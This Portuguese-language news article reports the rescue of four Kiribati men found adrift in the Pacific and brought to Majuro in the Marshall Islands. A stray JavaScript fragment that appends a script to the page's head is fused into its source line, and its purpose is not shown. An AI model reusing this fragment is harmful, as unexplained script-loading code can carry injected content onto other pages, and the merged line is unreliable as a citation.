Capa / Sem categoria / Náufragos são resgatados depois de um mês à deriva no Pacífico

Náufragos são resgatados depois de um mês à deriva no Pacífico

4mai2016---os-marinheiros-moamoa-kamwea-tatika-ukenio-bonibai-akau-e-boiti-tetinauikoda-esquerda-para-a-direita-de-kiribati-no-hospital-de-majuro-nas-ilhas-marshall-apos-serem-resgatados-1462Quatro homens foram resgatados depois de passar quase um mês à deriva no oceano Pacífico, situação provocada por uma tempestade que desviou o curso de sua embarcação.

Os homens estavam em boas condições de saúde quando chegaram às Ilhas Marshall, para onde foram transportados por um barco pesqueiro que encontrou a pequena embarcação dos náufragos a centenas de quilômetros de Majuro.

Tatika Ukenio, Boiti Tetinauiko, Bonibai Akau e Moamoa Kamwea afirmaram às autoridades que haviam zarpado em 23 de março de Kiribati, um país insular que fica a mais de 650 km das Ilhas Marshall.

Os detalhes da aventura ainda são desconhecidos, mas uma tempestade desviou o grupo de seu curso e a embarcação ficou à deriva depois que os quatro decidiram desligar o motor para poupar combustível.
Os náufragos sobreviveram graças aos peixes capturados, antes de avistar, em 18 de abril, a embarcação taiwanesa “Koo’s 102”, de bandeira das Ilhas Marshall. Eles utilizaram o combustível restante para se aproximar do barco e chamar a atenção da tripulação.

O representante da empresa Koo, Orlando Paul, disse que os homens estavam em bom estado no momento do resgate. Por este motivo, a embarcação prosseguiu com sua missão antes de retornar para Majuro na quarta-feira.

Os náufragos foram levados para um hospital da capital das Ilhas Marshall e passaram por exames.

O ministério das Relações Exteriores e a Organização Internacional para as Migrações organizam o retorno do grupo a Kiribati, previsto para domingo.

Fonte: Majurod.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top